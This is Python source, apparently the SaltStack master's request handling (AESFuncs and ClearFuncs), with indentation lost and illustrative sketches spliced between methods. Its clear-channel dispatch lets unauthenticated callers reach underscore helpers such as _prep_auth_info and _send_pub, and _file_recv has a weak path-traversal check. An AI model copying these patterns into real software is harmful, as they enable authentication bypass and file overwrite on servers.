'cmd': 'publish',
'fun': 'test.ping',
'jid': '',
'key': 'alsdkjfa.,maljf-==adflkjadflkjalkjadfadflkajdflkj',
'kwargs': {'show_jid': False, 'show_timeout': False},
'ret': '',
'tgt': 'myminion',
'tgt_type': 'glob',
'user': 'root'}}
:param dict payload: The payload route to the appropriate handler
'''
key = payload['enc']
load = payload['load']
ret = {'aes': self._handle_aes,
'clear': self._handle_clear}[key](load)
raise tornado.gen.Return(ret)
def _post_stats(self, stats):
'''
Fire events with stat info if it's time
'''
end_time = time.time()
if end_time - self.stat_clock > self.opts['master_stats_event_iter']:
# Fire the event with the stats and wipe the tracker
self.aes_funcs.event.fire_event({'time': end_time - self.stat_clock, 'worker': self.name, 'stats': stats}, tagify(self.name, 'stats'))
self.stats = collections.defaultdict(lambda: {'mean': 0, 'latency': 0, 'runs': 0})
self.stat_clock = end_time
def _handle_clear(self, load):
'''
Process a cleartext command
:param dict load: Cleartext payload
:return: The result of passing the load to a function in ClearFuncs corresponding to
the command specified in the load's 'cmd' key.
'''
log.trace('Clear payload received with command %s', load['cmd'])
cmd = load['cmd']
if cmd.startswith('__'):
return False
if self.opts['master_stats']:
start = time.time()
ret = getattr(self.clear_funcs, cmd)(load), {'fun': 'send_clear'}
if self.opts['master_stats']:
stats = salt.utils.event.update_stats(self.stats, start, load)
self._post_stats(stats)
return ret
def _handle_aes(self, data):
'''
Process a command sent via an AES key
        :param dict data: Encrypted payload
:return: The result of passing the load to a function in AESFuncs corresponding to
the command specified in the load's 'cmd' key.
'''
if 'cmd' not in data:
log.error('Received malformed command %s', data)
return {}
cmd = data['cmd']
log.trace('AES payload received with command %s', data['cmd'])
if cmd.startswith('__'):
return False
if self.opts['master_stats']:
start = time.time()
def run_func(data):
return self.aes_funcs.run_func(data['cmd'], data)
with StackContext(functools.partial(RequestContext,
{'data': data,
'opts': self.opts})):
ret = run_func(data)
if self.opts['master_stats']:
stats = salt.utils.event.update_stats(self.stats, start, data)
self._post_stats(stats)
return ret
def run(self):
'''
Start a Master Worker
'''
salt.utils.process.appendproctitle(self.name)
self.clear_funcs = ClearFuncs(
self.opts,
self.key,
)
self.aes_funcs = AESFuncs(self.opts)
salt.utils.crypt.reinit_crypto()
self.__bind()
# TODO: rename? No longer tied to "AES", just "encrypted" or "private" requests
class AESFuncs(object):
'''
Set up functions that are available when the load is encrypted with AES
'''
# The AES Functions:
#
def __init__(self, opts):
'''
Create a new AESFuncs
:param dict opts: The salt options
:rtype: AESFuncs
:returns: Instance for handling AES operations
'''
self.opts = opts
self.event = salt.utils.event.get_master_event(self.opts, self.opts['sock_dir'], listen=False)
self.serial = salt.payload.Serial(opts)
self.ckminions = salt.utils.minions.CkMinions(opts)
# Make a client
self.local = salt.client.get_local_client(self.opts['conf_file'])
# Create the master minion to access the external job cache
self.mminion = salt.minion.MasterMinion(
self.opts,
states=False,
rend=False,
ignore_config_errors=True
)
self.__setup_fileserver()
self.masterapi = salt.daemons.masterapi.RemoteFuncs(opts)
def __setup_fileserver(self):
'''
Set the local file objects from the file server interface
'''
# Avoid circular import
import salt.fileserver
self.fs_ = salt.fileserver.Fileserver(self.opts)
self._serve_file = self.fs_.serve_file
self._file_find = self.fs_._find_file
self._file_hash = self.fs_.file_hash
self._file_hash_and_stat = self.fs_.file_hash_and_stat
self._file_list = self.fs_.file_list
self._file_list_emptydirs = self.fs_.file_list_emptydirs
self._dir_list = self.fs_.dir_list
self._symlink_list = self.fs_.symlink_list
self._file_envs = self.fs_.file_envs
def __verify_minion(self, id_, token):
'''
Take a minion id and a string signed with the minion private key
The string needs to verify as 'salt' with the minion public key
:param str id_: A minion ID
:param str token: A string signed with the minion private key
:rtype: bool
:return: Boolean indicating whether or not the token can be verified.
'''
if not salt.utils.verify.valid_id(self.opts, id_):
return False
pub_path = os.path.join(self.opts['pki_dir'], 'minions', id_)
try:
pub = salt.crypt.get_rsa_pub_key(pub_path)
except (IOError, OSError):
log.warning(
'Salt minion claiming to be %s attempted to communicate with '
'master, but key could not be read and verification was denied.',
id_
)
return False
        except (ValueError, IndexError, TypeError) as err:
            log.error('Unable to load public key "%s": %s', pub_path, err)
            return False
try:
if salt.crypt.public_decrypt(pub, token) == b'salt':
return True
except ValueError as err:
log.error('Unable to decrypt token: %s', err)
log.error(
'Salt minion claiming to be %s has attempted to communicate with '
'the master and could not be verified', id_
)
return False
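    # The minion-side counterpart, for context (a sketch, assuming the RSA
    # helpers in salt.crypt; exact helper names may differ by version): the
    # token is the bytes b'salt' encrypted with the minion's private key, so
    # public_decrypt(pub, token) == b'salt' proves possession of that key.
    #
    # tok = salt.crypt.private_encrypt(minion_priv_key, b'salt')
    # load = {'id': 'myminion', 'tok': tok}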
def verify_minion(self, id_, token):
'''
Take a minion id and a string signed with the minion private key
The string needs to verify as 'salt' with the minion public key
:param str id_: A minion ID
:param str token: A string signed with the minion private key
:rtype: bool
:return: Boolean indicating whether or not the token can be verified.
'''
return self.__verify_minion(id_, token)
def __verify_minion_publish(self, clear_load):
'''
Verify that the passed information authorized a minion to execute
:param dict clear_load: A publication load from a minion
:rtype: bool
:return: A boolean indicating if the minion is allowed to publish the command in the load
'''
# Verify that the load is valid
if 'peer' not in self.opts:
return False
if not isinstance(self.opts['peer'], dict):
return False
if any(key not in clear_load for key in ('fun', 'arg', 'tgt', 'ret', 'tok', 'id')):
return False
# If the command will make a recursive publish don't run
if clear_load['fun'].startswith('publish.'):
return False
# Check the permissions for this minion
if not self.__verify_minion(clear_load['id'], clear_load['tok']):
# The minion is not who it says it is!
# We don't want to listen to it!
log.warning(
'Minion id %s is not who it says it is and is attempting '
'to issue a peer command', clear_load['id']
)
return False
clear_load.pop('tok')
perms = []
for match in self.opts['peer']:
if re.match(match, clear_load['id']):
# This is the list of funcs/modules!
if isinstance(self.opts['peer'][match], list):
perms.extend(self.opts['peer'][match])
if ',' in clear_load['fun']:
# 'arg': [['cat', '/proc/cpuinfo'], [], ['foo']]
clear_load['fun'] = clear_load['fun'].split(',')
arg_ = []
for arg in clear_load['arg']:
arg_.append(arg.split())
clear_load['arg'] = arg_
# finally, check the auth of the load
return self.ckminions.auth_check(
perms,
clear_load['fun'],
clear_load['arg'],
clear_load['tgt'],
clear_load.get('tgt_type', 'glob'),
publish_validate=True)
def __verify_load(self, load, verify_keys):
'''
A utility function to perform common verification steps.
:param dict load: A payload received from a minion
:param list verify_keys: A list of strings that should be present in a
given load
        :rtype: bool or dict
:return: The original load (except for the token) if the load can be
verified. False if the load is invalid.
'''
if any(key not in load for key in verify_keys):
return False
if 'tok' not in load:
log.error(
'Received incomplete call from %s for \'%s\', missing \'%s\'',
load['id'], inspect_stack()['co_name'], 'tok'
)
return False
if not self.__verify_minion(load['id'], load['tok']):
# The minion is not who it says it is!
# We don't want to listen to it!
log.warning('Minion id %s is not who it says it is!', load['id'])
return False
if 'tok' in load:
load.pop('tok')
return load
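    # Typical call pattern, as used by the handlers below: pass the raw load
    # plus the keys that must be present, and short-circuit on failure.
    #
    # load = self.__verify_load(load, ('id', 'tok'))
    # if load is False:
    #     return {}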
def _master_tops(self, load):
'''
Return the results from an external node classifier if one is
specified
:param dict load: A payload received from a minion
:return: The results from an external node classifier
'''
load = self.__verify_load(load, ('id', 'tok'))
if load is False:
return {}
return self.masterapi._master_tops(load, skip_verify=True)
# Needed so older minions can request master_tops
_ext_nodes = _master_tops
def _master_opts(self, load):
'''
Return the master options to the minion
:param dict load: A payload received from a minion
:rtype: dict
:return: The master options
'''
mopts = {}
file_roots = {}
envs = self._file_envs()
for saltenv in envs:
if saltenv not in file_roots:
file_roots[saltenv] = []
mopts['file_roots'] = file_roots
mopts['top_file_merging_strategy'] = self.opts['top_file_merging_strategy']
mopts['env_order'] = self.opts['env_order']
mopts['default_top'] = self.opts['default_top']
if load.get('env_only'):
return mopts
mopts['renderer'] = self.opts['renderer']
mopts['failhard'] = self.opts['failhard']
mopts['state_top'] = self.opts['state_top']
mopts['state_top_saltenv'] = self.opts['state_top_saltenv']
mopts['nodegroups'] = self.opts['nodegroups']
mopts['state_auto_order'] = self.opts['state_auto_order']
mopts['state_events'] = self.opts['state_events']
mopts['state_aggregate'] = self.opts['state_aggregate']
mopts['jinja_env'] = self.opts['jinja_env']
mopts['jinja_sls_env'] = self.opts['jinja_sls_env']
mopts['jinja_lstrip_blocks'] = self.opts['jinja_lstrip_blocks']
mopts['jinja_trim_blocks'] = self.opts['jinja_trim_blocks']
return mopts
def _mine_get(self, load):
'''
Gathers the data from the specified minions' mine
:param dict load: A payload received from a minion
:rtype: dict
:return: Mine data from the specified minions
'''
load = self.__verify_load(load, ('id', 'tgt', 'fun', 'tok'))
if load is False:
return {}
else:
return self.masterapi._mine_get(load, skip_verify=True)
def _mine(self, load):
'''
Store the mine data
:param dict load: A payload received from a minion
:rtype: bool
:return: True if the data has been stored in the mine
'''
load = self.__verify_load(load, ('id', 'data', 'tok'))
if load is False:
return {}
return self.masterapi._mine(load, skip_verify=True)
def _mine_delete(self, load):
'''
Allow the minion to delete a specific function from its own mine
:param dict load: A payload received from a minion
:rtype: bool
:return: Boolean indicating whether or not the given function was deleted from the mine
'''
load = self.__verify_load(load, ('id', 'fun', 'tok'))
if load is False:
return {}
else:
return self.masterapi._mine_delete(load)
def _mine_flush(self, load):
'''
Allow the minion to delete all of its own mine contents
:param dict load: A payload received from a minion
'''
load = self.__verify_load(load, ('id', 'tok'))
if load is False:
return {}
else:
return self.masterapi._mine_flush(load, skip_verify=True)
def _file_recv(self, load):
'''
Allows minions to send files to the master, files are sent to the
master file cache
'''
if any(key not in load for key in ('id', 'path', 'loc')):
return False
if not isinstance(load['path'], list):
return False
if not self.opts['file_recv']:
return False
if not salt.utils.verify.valid_id(self.opts, load['id']):
return False
if 'loc' in load and load['loc'] < 0:
log.error('Invalid file pointer: load[loc] < 0')
return False
if len(load['data']) + load.get('loc', 0) > self.opts['file_recv_max_size'] * 0x100000:
log.error(
'file_recv_max_size limit of %d MB exceeded! %s will be '
'truncated. To successfully push this file, adjust '
'file_recv_max_size to an integer (in MB) large enough to '
'accommodate it.', self.opts['file_recv_max_size'], load['path']
)
return False
if 'tok' not in load:
log.error(
'Received incomplete call from %s for \'%s\', missing \'%s\'',
load['id'], inspect_stack()['co_name'], 'tok'
)
return False
if not self.__verify_minion(load['id'], load['tok']):
# The minion is not who it says it is!
# We don't want to listen to it!
log.warning('Minion id %s is not who it says it is!', load['id'])
return {}
load.pop('tok')
# Join path
sep_path = os.sep.join(load['path'])
# Path normalization should have been done by the sending
# minion but we can't guarantee it. Re-do it here.
normpath = os.path.normpath(sep_path)
# Ensure that this safety check is done after the path
# have been normalized.
if os.path.isabs(normpath) or '../' in load['path']:
# Can overwrite master files!!
return False
cpath = os.path.join(
self.opts['cachedir'],
'minions',
load['id'],
'files',
normpath)
# One last safety check here
if not os.path.normpath(cpath).startswith(self.opts['cachedir']):
log.warning(
'Attempt to write received file outside of master cache '
'directory! Requested path: %s. Access denied.', cpath
)
return False
cdir = os.path.dirname(cpath)
if not os.path.isdir(cdir):
try:
os.makedirs(cdir)
except os.error:
pass
if os.path.isfile(cpath) and load['loc'] != 0:
mode = 'ab'
else:
mode = 'wb'
with salt.utils.files.fopen(cpath, mode) as fp_:
if load['loc']:
fp_.seek(load['loc'])
fp_.write(salt.utils.stringutils.to_bytes(load['data']))
return True
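# A minimal standalone sketch (illustrative names, not Salt API) of the
# directory-traversal guard _file_recv applies above: normalize the joined
# path, reject absolute paths and parent references, then confirm the final
# destination still resolves inside the cache root.
import os

def safe_cache_path(cache_root, minion_id, path_parts):
    normpath = os.path.normpath(os.sep.join(path_parts))
    # Reject absolute paths and any attempt to climb out of the tree.
    if os.path.isabs(normpath) or '..' in path_parts or '../' in normpath:
        return None
    cpath = os.path.join(cache_root, 'minions', minion_id, 'files', normpath)
    # One last check: the normalized result must stay inside cache_root.
    if not os.path.normpath(cpath).startswith(os.path.normpath(cache_root)):
        return None
    return cpath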
def _pillar(self, load):
'''
Return the pillar data for the minion
:param dict load: Minion payload
:rtype: dict
:return: The pillar data for the minion
'''
if any(key not in load for key in ('id', 'grains')):
return False
if not salt.utils.verify.valid_id(self.opts, load['id']):
return False
load['grains']['id'] = load['id']
pillar = salt.pillar.get_pillar(
self.opts,
load['grains'],
load['id'],
load.get('saltenv', load.get('env')),
ext=load.get('ext'),
pillar_override=load.get('pillar_override', {}),
pillarenv=load.get('pillarenv'),
extra_minion_data=load.get('extra_minion_data'))
data = pillar.compile_pillar()
self.fs_.update_opts()
if self.opts.get('minion_data_cache', False):
self.masterapi.cache.store('minions/{0}'.format(load['id']),
'data',
{'grains': load['grains'],
'pillar': data})
if self.opts.get('minion_data_cache_events') is True:
self.event.fire_event({'Minion data cache refresh': load['id']}, tagify(load['id'], 'refresh', 'minion'))
return data
def _minion_event(self, load):
'''
Receive an event from the minion and fire it on the master event
interface
:param dict load: The minion payload
'''
load = self.__verify_load(load, ('id', 'tok'))
if load is False:
return {}
# Route to master event bus
self.masterapi._minion_event(load)
# Process locally
self._handle_minion_event(load)
def _handle_minion_event(self, load):
'''
Act on specific events from minions
'''
id_ = load['id']
if load.get('tag', '') == '_salt_error':
log.error(
'Received minion error from [%s]: %s',
id_, load['data']['message']
)
for event in load.get('events', []):
event_data = event.get('data', {})
if 'minions' in event_data:
jid = event_data.get('jid')
if not jid:
continue
minions = event_data['minions']
try:
salt.utils.job.store_minions(
self.opts,
jid,
minions,
mminion=self.mminion,
syndic_id=id_)
except (KeyError, salt.exceptions.SaltCacheError) as exc:
log.error(
'Could not add minion(s) %s for job %s: %s',
minions, jid, exc
)
def _return(self, load):
'''
Handle the return data sent from the minions.
Takes the return, verifies it and fires it on the master event bus.
Typically, this event is consumed by the Salt CLI waiting on the other
end of the event bus but could be heard by any listener on the bus.
:param dict load: The minion payload
'''
if self.opts['require_minion_sign_messages'] and 'sig' not in load:
log.critical(
'_return: Master is requiring minions to sign their '
'messages, but there is no signature in this payload from '
'%s.', load['id']
)
return False
if 'sig' in load:
log.trace('Verifying signed event publish from minion')
sig = load.pop('sig')
this_minion_pubkey = os.path.join(self.opts['pki_dir'], 'minions/{0}'.format(load['id']))
serialized_load = salt.serializers.msgpack.serialize(load)
if not salt.crypt.verify_signature(this_minion_pubkey, serialized_load, sig):
log.info('Failed to verify event signature from minion %s.', load['id'])
if self.opts['drop_messages_signature_fail']:
log.critical(
'Drop_messages_signature_fail is enabled, dropping '
'message from %s', load['id']
)
return False
else:
log.info('But \'drop_message_signature_fail\' is disabled, so message is still accepted.')
load['sig'] = sig
try:
salt.utils.job.store_job(
self.opts, load, event=self.event, mminion=self.mminion)
except salt.exceptions.SaltCacheError:
log.error('Could not store job information for load: %s', load)
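# Salt verifies the signature above with the minion's per-minion RSA public
# key via salt.crypt.verify_signature. As a self-contained illustration of the
# same verify-or-drop policy, the sketch below substitutes a stdlib HMAC over
# a JSON-serialized load; shared_key and the function name are hypothetical.
import hashlib
import hmac
import json

def verify_or_drop(load, shared_key, drop_on_fail=True):
    sig = load.pop('sig', None)
    if sig is None:
        return None  # no signature present: reject when signing is required
    serialized = json.dumps(load, sort_keys=True).encode('utf-8')
    expected = hmac.new(shared_key, serialized, hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, sig) and drop_on_fail:
        return None  # mirrors the drop_messages_signature_fail behaviour
    load['sig'] = sig  # keep the signature with the stored job
    return load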
def _syndic_return(self, load):
'''
Receive a syndic minion return and format it to look like returns from
individual minions.
:param dict load: The minion payload
'''
loads = load.get('load')
if not isinstance(loads, list):
loads = [load] # support old syndics not aggregating returns
for load in loads:
# Verify the load
if any(key not in load for key in ('return', 'jid', 'id')):
continue
# if we have a load, save it
if load.get('load'):
fstr = '{0}.save_load'.format(self.opts['master_job_cache'])
self.mminion.returners[fstr](load['jid'], load['load'])
# Register the syndic
syndic_cache_path = os.path.join(self.opts['cachedir'], 'syndics', load['id'])
if not os.path.exists(syndic_cache_path):
path_name = os.path.split(syndic_cache_path)[0]
if not os.path.exists(path_name):
os.makedirs(path_name)
with salt.utils.files.fopen(syndic_cache_path, 'w') as wfh:
wfh.write('')
# Format individual return loads
for key, item in six.iteritems(load['return']):
ret = {'jid': load['jid'],
'id': key}
ret.update(item)
if 'master_id' in load:
ret['master_id'] = load['master_id']
if 'fun' in load:
ret['fun'] = load['fun']
if 'arg' in load:
ret['fun_args'] = load['arg']
if 'out' in load:
ret['out'] = load['out']
if 'sig' in load:
ret['sig'] = load['sig']
self._return(ret)
def minion_runner(self, clear_load):
'''
Execute a runner from a minion, return the runner's function data
:param dict clear_load: The minion payload
:rtype: dict
:return: The runner function data
'''
load = self.__verify_load(clear_load, ('fun', 'arg', 'id', 'tok'))
if load is False:
return {}
else:
return self.masterapi.minion_runner(clear_load)
def pub_ret(self, load):
'''
Request the return data for a specific jid; only allowed
if the requesting minion also initiated the execution.
:param dict load: The minion payload
:rtype: dict
:return: Return data corresponding to a given JID
'''
load = self.__verify_load(load, ('jid', 'id', 'tok'))
if load is False:
return {}
# Check that this minion can access this data
auth_cache = os.path.join(
self.opts['cachedir'],
'publish_auth')
if not os.path.isdir(auth_cache):
os.makedirs(auth_cache)
jid_fn = os.path.join(auth_cache, six.text_type(load['jid']))
with salt.utils.files.fopen(jid_fn, 'r') as fp_:
if not load['id'] == fp_.read():
return {}
# Grab the latest and return
return self.local.get_cache_returns(load['jid'])
def minion_pub(self, clear_load):
'''
Publish a command initiated from a minion; this method enforces minion
restrictions so that the minion publication will only work if it is
enabled in the config.
The configuration on the master allows minions to be matched to
salt functions, so the minions can only publish allowed salt functions
The config will look like this:
.. code-block:: bash
peer:
.*:
- .*
This configuration will enable all minions to execute all commands:
.. code-block:: bash
peer:
foo.example.com:
- test.*
The above configuration will only allow the minion foo.example.com to
execute commands from the test module.
:param dict clear_load: The minion payload
'''
if not self.__verify_minion_publish(clear_load):
return {}
else:
return self.masterapi.minion_pub(clear_load)
def minion_publish(self, clear_load):
'''
Publish a command initiated from a minion; this method enforces minion
restrictions so that the minion publication will only work if it is
enabled in the config.
The configuration on the master allows minions to be matched to
salt functions, so the minions can only publish allowed salt functions
The config will look like this:
.. code-block:: bash
peer:
.*:
- .*
This configuration will enable all minions to execute all commands.
.. code-block:: bash
peer:
foo.example.com:
- test.*
The above configuration will only allow the minion foo.example.com to
execute commands from the test module.
:param dict clear_load: The minion payload
'''
if not self.__verify_minion_publish(clear_load):
return {}
else:
return self.masterapi.minion_publish(clear_load)
def revoke_auth(self, load):
'''
Allow a minion to request revocation of its own key
:param dict load: The minion payload
:rtype: dict or bool
:return: The load is returned unchanged if it is invalid or if key
    revocation is disallowed (no key operation is performed);
    otherwise True if the key was revoked, False if not
'''
load = self.__verify_load(load, ('id', 'tok'))
if not self.opts.get('allow_minion_key_revoke', False):
log.warning(
'Minion %s requested key revoke, but allow_minion_key_revoke '
'is set to False', load['id']
)
return load
if load is False:
return load
else:
return self.masterapi.revoke_auth(load)
def run_func(self, func, load):
'''
Wrapper for running functions executed with AES encryption
:param str func: The name of the function to run
:param dict load: The minion payload
:return: The result of the master function that was called
'''
# Don't honor private functions
if func.startswith('__'):
# TODO: return some error? Seems odd to return {}
return {}, {'fun': 'send'}
# Run the func
if hasattr(self, func):
try:
start = time.time()
ret = getattr(self, func)(load)
log.trace(
'Master function call %s took %s seconds',
func, time.time() - start
)
except Exception:
ret = ''
log.error('Error in function %s:\n', func, exc_info=True)
else:
log.error(
'Received function %s which is unavailable on the master, '
'returning False', func
)
return False, {'fun': 'send'}
# Don't encrypt the return value for the _return func
# (we don't care about the return value, so why encrypt it?)
if func == '_return':
return ret, {'fun': 'send'}
if func == '_pillar' and 'id' in load:
if load.get('ver') != '2' and self.opts['pillar_version'] == 1:
# Authorized to return old pillar proto
return ret, {'fun': 'send'}
return ret, {'fun': 'send_private', 'key': 'pillar', 'tgt': load['id']}
# Encrypt the return
return ret, {'fun': 'send'}
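# run_func above is a guarded getattr dispatch: refuse private names, look the
# handler up on the instance, time it, and swallow handler exceptions. A
# minimal sketch of that pattern (the Dispatcher class is illustrative only):
import logging
import time

example_log = logging.getLogger(__name__)

class Dispatcher(object):
    def ping(self, load):
        return load

    def run_func(self, func, load):
        if func.startswith('__'):
            return {}  # never expose private attributes
        if not hasattr(self, func):
            example_log.error('Function %s unavailable', func)
            return False
        start = time.time()
        try:
            ret = getattr(self, func)(load)
        except Exception:
            example_log.error('Error in function %s', func, exc_info=True)
            ret = ''
        example_log.debug('%s took %s seconds', func, time.time() - start)
        return ret

# Dispatcher().run_func('ping', {'id': 'minion1'}) -> {'id': 'minion1'}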
class ClearFuncs(object):
'''
Set up functions that are safe to execute when commands are sent to the
master without encryption and authentication
'''
# The ClearFuncs object encapsulates the functions that can be executed in
# the clear:
# publish (The publish from the LocalClient)
# _auth
def __init__(self, opts, key):
self.opts = opts
self.key = key
# Create the event manager
self.event = salt.utils.event.get_master_event(self.opts, self.opts['sock_dir'], listen=False)
# Make a client
self.local = salt.client.get_local_client(self.opts['conf_file'])
# Make a minion checker object
self.ckminions = salt.utils.minions.CkMinions(opts)
# Make an Auth object
self.loadauth = salt.auth.LoadAuth(opts)
# Stand up the master Minion to access returner data
self.mminion = salt.minion.MasterMinion(
self.opts,
states=False,
rend=False,
ignore_config_errors=True
)
# Make a wheel object
self.wheel_ = salt.wheel.Wheel(opts)
# Make a masterapi object
self.masterapi = salt.daemons.masterapi.LocalFuncs(opts, key)
def runner(self, clear_load):
'''
Send a master control function back to the runner system
'''
# All runner ops pass through eauth
auth_type, err_name, key, sensitive_load_keys = self._prep_auth_info(clear_load)
# Authenticate
auth_check = self.loadauth.check_authentication(clear_load, auth_type, key=key)
error = auth_check.get('error')
if error:
# Authentication error occurred: do not continue.
return {'error': error}
# Authorize
username = auth_check.get('username')
if auth_type != 'user':
runner_check = self.ckminions.runner_check(
auth_check.get('auth_list', []),
clear_load['fun'],
clear_load.get('kwarg', {})
)
if not runner_check:
return {'error': {'name': err_name,
'message': 'Authentication failure of type "{0}" occurred for '
'user {1}.'.format(auth_type, username)}}
elif isinstance(runner_check, dict) and 'error' in runner_check:
# A dictionary with an error name/message was handled by ckminions.runner_check
return runner_check
# No error occurred, consume sensitive settings from the clear_load if passed.
for item in sensitive_load_keys:
clear_load.pop(item, None)
else:
if 'user' in clear_load:
username = clear_load['user']
if salt.auth.AuthUser(username).is_sudo():
username = self.opts.get('user', 'root')
else:
username = salt.utils.user.get_user()
# Authorized. Do the job!
try:
fun = clear_load.pop('fun')
runner_client = salt.runner.RunnerClient(self.opts)
return runner_client.asynchronous(fun,
clear_load.get('kwarg', {}),
username)
except Exception as exc:
log.error('Exception occurred while introspecting %s: %s', fun, exc)
return {'error': {'name': exc.__class__.__name__,
'args': exc.args,
'message': six.text_type(exc)}}
def wheel(self, clear_load):
'''
Send a master control function back to the wheel system
'''
# All wheel ops pass through eauth
auth_type, err_name, key, sensitive_load_keys = self._prep_auth_info(clear_load)
# Authenticate
auth_check = self.loadauth.check_authentication(clear_load, auth_type, key=key)
error = auth_check.get('error')
if error:
# Authentication error occurred: do not continue.
return {'error': error}
# Authorize
username = auth_check.get('username')
if auth_type != 'user':
wheel_check = self.ckminions.wheel_check(
auth_check.get('auth_list', []),
clear_load['fun'],
clear_load.get('kwarg', {})
)
if not wheel_check:
return {'error': {'name': err_name,
'message': 'Authentication failure of type "{0}" occurred for '
'user {1}.'.format(auth_type, username)}}
elif isinstance(wheel_check, dict) and 'error' in wheel_check:
# A dictionary with an error name/message was handled by ckminions.wheel_check
return wheel_check
# No error occurred, consume sensitive settings from the clear_load if passed.
for item in sensitive_load_keys:
clear_load.pop(item, None)
else:
if 'user' in clear_load:
username = clear_load['user']
if salt.auth.AuthUser(username).is_sudo():
username = self.opts.get('user', 'root')
else:
username = salt.utils.user.get_user()
# Authorized. Do the job!
try:
jid = salt.utils.jid.gen_jid(self.opts)
fun = clear_load.pop('fun')
tag = tagify(jid, prefix='wheel')
data = {'fun': "wheel.{0}".format(fun),
'jid': jid,
'tag': tag,
'user': username}
self.event.fire_event(data, tagify([jid, 'new'], 'wheel'))
ret = self.wheel_.call_func(fun, full_return=True, **clear_load)
data['return'] = ret['return']
data['success'] = ret['success']
self.event.fire_event(data, tagify([jid, 'ret'], 'wheel'))
return {'tag': tag,
'data': data}
except Exception as exc:
log.error('Exception occurred while introspecting %s: %s', fun, exc)
data['return'] = 'Exception occurred in wheel {0}: {1}: {2}'.format(
fun,
exc.__class__.__name__,
exc,
)
data['success'] = False
self.event.fire_event(data, tagify([jid, 'ret'], 'wheel'))
return {'tag': tag,
'data': data}
def mk_token(self, clear_load):
'''
Create and return an authentication token; the clear load must
contain the eauth key and the required authentication credentials.
'''
token = self.loadauth.mk_token(clear_load)
if not token:
log.warning('Authentication failure of type "eauth" occurred.')
return ''
return token
def get_token(self, clear_load):
'''
Return the name associated with a token or False if the token is invalid
'''
if 'token' not in clear_load:
return False
return self.loadauth.get_tok(clear_load['token'])
def publish(self, clear_load):
'''
This method sends out publications to the minions; it can only be used
by the LocalClient.
'''
extra = clear_load.get('kwargs', {})
publisher_acl = salt.acl.PublisherACL(self.opts['publisher_acl_blacklist'])
if publisher_acl.user_is_blacklisted(clear_load['user']) or \
publisher_acl.cmd_is_blacklisted(clear_load['fun']):
log.error(
'%s does not have permissions to run %s. Please contact '
'your local administrator if you believe this is in '
'error.\n', clear_load['user'], clear_load['fun']
)
return {'error': {'name': 'AuthorizationError',
'message': 'Authorization error occurred.'}}
# Retrieve the minions list
delimiter = clear_load.get('kwargs', {}).get('delimiter', DEFAULT_TARGET_DELIM)
_res = self.ckminions.check_minions(
clear_load['tgt'],
clear_load.get('tgt_type', 'glob'),
delimiter
)
minions = _res.get('minions', list())
missing = _res.get('missing', list())
ssh_minions = _res.get('ssh_minions', False)
# Check for external auth calls and authenticate
auth_type, err_name, key, sensitive_load_keys = self._prep_auth_info(extra)
if auth_type == 'user':
auth_check = self.loadauth.check_authentication(clear_load, auth_type, key=key)
else:
auth_check = self.loadauth.check_authentication(extra, auth_type)
# Setup authorization list variable and error information
auth_list = auth_check.get('auth_list', [])
err_msg = 'Authentication failure of type "{0}" occurred.'.format(auth_type)
if auth_check.get('error'):
# Authentication error occurred: do not continue.
log.warning(err_msg)
return {'error': {'name': 'AuthenticationError',
'message': 'Authentication error occurred.'}}
# All Token, Eauth, and non-root users must pass the authorization check
if auth_type != 'user' or (auth_type == 'user' and auth_list):
# Authorize the request
authorized = self.ckminions.auth_check(
auth_list,
clear_load['fun'],
clear_load['arg'],
clear_load['tgt'],
clear_load.get('tgt_type', 'glob'),
minions=minions,
# always accept find_job
whitelist=['saltutil.find_job'],
)
if not authorized:
# Authorization error occurred. Do not continue.
if auth_type == 'eauth' and not auth_list and 'username' in extra and 'eauth' in extra:
log.debug('Auth configuration for eauth "%s" and user "%s" is empty', extra['eauth'], extra['username'])
log.warning(err_msg)
return {'error': {'name': 'AuthorizationError',
'message': 'Authorization error occurred.'}}
# Perform some specific auth_type tasks after the authorization check
if auth_type == 'token':
username = auth_check.get('username')
clear_load['user'] = username
log.debug('Minion tokenized user = "%s"', username)
elif auth_type == 'eauth':
# The username we are attempting to auth with
clear_load['user'] = self.loadauth.load_name(extra)
# If we order masters (via a syndic), don't short circuit if no minions
# are found
if not self.opts.get('order_masters'):
# Check for no minions
if not minions:
return {
'enc': 'clear',
'load': {
'jid': None,
'minions': minions,
'error': 'Master could not resolve minions for target {0}'.format(clear_load['tgt'])
}
}
jid = self._prep_jid(clear_load, extra)
if jid is None:
return {'enc': 'clear',
'load': {'error': 'Master failed to assign jid'}}
payload = self._prep_pub(minions, jid, clear_load, extra, missing)
# Send it!
self._send_ssh_pub(payload, ssh_minions=ssh_minions)
self._send_pub(payload)
return {
'enc': 'clear',
'load': {
'jid': clear_load['jid'],
'minions': minions,
'missing': missing
}
}
def _prep_auth_info(self, clear_load):
sensitive_load_keys = []
key = None
if 'token' in clear_load:
auth_type = 'token'
err_name = 'TokenAuthenticationError'
sensitive_load_keys = ['token']
elif 'eauth' in clear_load:
auth_type = 'eauth'
err_name = 'EauthAuthenticationError'
sensitive_load_keys = ['username', 'password']
else:
auth_type = 'user'
err_name = 'UserAuthenticationError'
key = self.key
return auth_type, err_name, key, sensitive_load_keys
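# The precedence _prep_auth_info applies is simply: an explicit token wins
# over eauth credentials, which win over the local root key. A trivial
# illustration with hypothetical loads:
for sample in ({'token': 'abc123'},
               {'eauth': 'pam', 'username': 'u', 'password': 'p'},
               {'cmd': 'publish'}):
    if 'token' in sample:
        print('token auth')
    elif 'eauth' in sample:
        print('eauth auth')
    else:
        print('user auth (local key)')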
def _prep_jid(self, clear_load, extra):
'''
Return a jid for this publication
'''
# the jid in clear_load can be None, '', or something else. this is an
# attempt to clean up the value before passing to plugins
passed_jid = clear_load['jid'] if clear_load.get('jid') else None
nocache = extra.get('nocache', False)
# Retrieve the jid
fstr = '{0}.prep_jid'.format(self.opts['master_job_cache'])
try:
# Retrieve the jid
jid = self.mminion.returners[fstr](nocache=nocache,
passed_jid=passed_jid)
except (KeyError, TypeError):
# The returner is not present
msg = (
'Failed to allocate a jid. The requested returner \'{0}\' '
'could not be loaded.'.format(fstr.split('.')[0])
)
log.error(msg)
return {'error': msg}
return jid
def _send_pub(self, load):
'''
Take a load and send it across the network to connected minions
'''
for transport, opts in iter_transport_opts(self.opts):
chan = salt.transport.server.PubServerChannel.factory(opts)
chan.publish(load)
@property
def ssh_client(self):
if not hasattr(self, '_ssh_client'):
self._ssh_client = salt.client.ssh.client.SSHClient(mopts=self.opts)
return self._ssh_client
def _send_ssh_pub(self, load, ssh_minions=False):
'''
Take a load and send it across the network to ssh minions
'''
